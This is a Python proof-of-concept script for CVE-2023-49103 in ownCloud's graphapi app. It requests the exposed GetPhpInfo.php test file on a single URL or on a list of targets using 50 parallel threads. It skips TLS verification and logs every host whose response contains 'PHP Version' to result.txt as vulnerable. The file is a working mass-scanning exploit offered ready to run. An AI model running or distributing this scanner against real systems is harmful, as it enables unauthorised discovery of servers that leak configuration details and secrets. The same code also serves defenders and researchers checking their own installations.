import requests,argparse,sys
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    banner = """ $$$$$$\  $$\    $$\ $$$$$$$$\       $$$$$$\   $$$$$$\   $$$$$$\   $$$$$$\         $$\   $$\  $$$$$$\    $$\   $$$$$$\   $$$$$$\  
$$  __$$\ $$ |   $$ |$$  _____|     $$  __$$\ $$$ __$$\ $$  __$$\ $$ ___$$\        $$ |  $$ |$$  __$$\ $$$$ | $$$ __$$\ $$ ___$$\ 
$$ /  \__|$$ |   $$ |$$ |           \__/  $$ |$$$$\ $$ |\__/  $$ |\_/   $$ |       $$ |  $$ |$$ /  $$ |\_$$ | $$$$\ $$ |\_/   $$ |
$$ |      \$$\  $$  |$$$$$\ $$$$$$\  $$$$$$  |$$\$$\$$ | $$$$$$  |  $$$$$ /$$$$$$\ $$$$$$$$ |\$$$$$$$ |  $$ | $$\$$\$$ |  $$$$$ / 
$$ |       \$$\$$  / $$  __|\______|$$  ____/ $$ \$$$$ |$$  ____/   \___$$\\______|\_____$$ | \____$$ |  $$ | $$ \$$$$ |  \___$$\ 
$$ |  $$\   \$$$  /  $$ |           $$ |      $$ |\$$$ |$$ |      $$\   $$ |             $$ |$$\   $$ |  $$ | $$ |\$$$ |$$\   $$ |
\$$$$$$  |   \$  /   $$$$$$$$\      $$$$$$$$\ \$$$$$$  /$$$$$$$$\ \$$$$$$  |             $$ |\$$$$$$  |$$$$$$\\$$$$$$  /\$$$$$$  |
 \______/     \_/    \________|     \________| \______/ \________| \______/              \__| \______/ \______|\______/  \______/ 
                                                                                                                                  
                                                                                                                                  
                                                                                                                                  

"""
    print(banner)

def main():
    banner()
    parser = argparse.ArgumentParser(description="CVE-2023-49103")
    parser.add_argument('-u','-url',dest='url',type=str,help="Please input your URL")
    parser.add_argument('-f','-file',dest='file',type=str,help="Please input your File path")
    args = parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(50)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    payload = "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"
    headers = {     
        'User-Agent': 'python-requests/2.31.0',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'close',
    }
    try:
        res1 = requests.get(url=target+payload,headers=headers,verify=False,timeout=5)
        # print(res1.text)
        if res1.status_code == 200 and 'PHP Version' in res1.text:
            print(f"[+]{target}存在敏感信息泄漏漏洞")
            with open('result.txt','a')as f:
                f.write(target+'\n')
        else:
                print(f"[-]{target}不存在敏感信息泄漏漏洞")
    except Exception as e:
        print(f"Exception occurred: {e}")
if __name__ == "__main__":
    main()
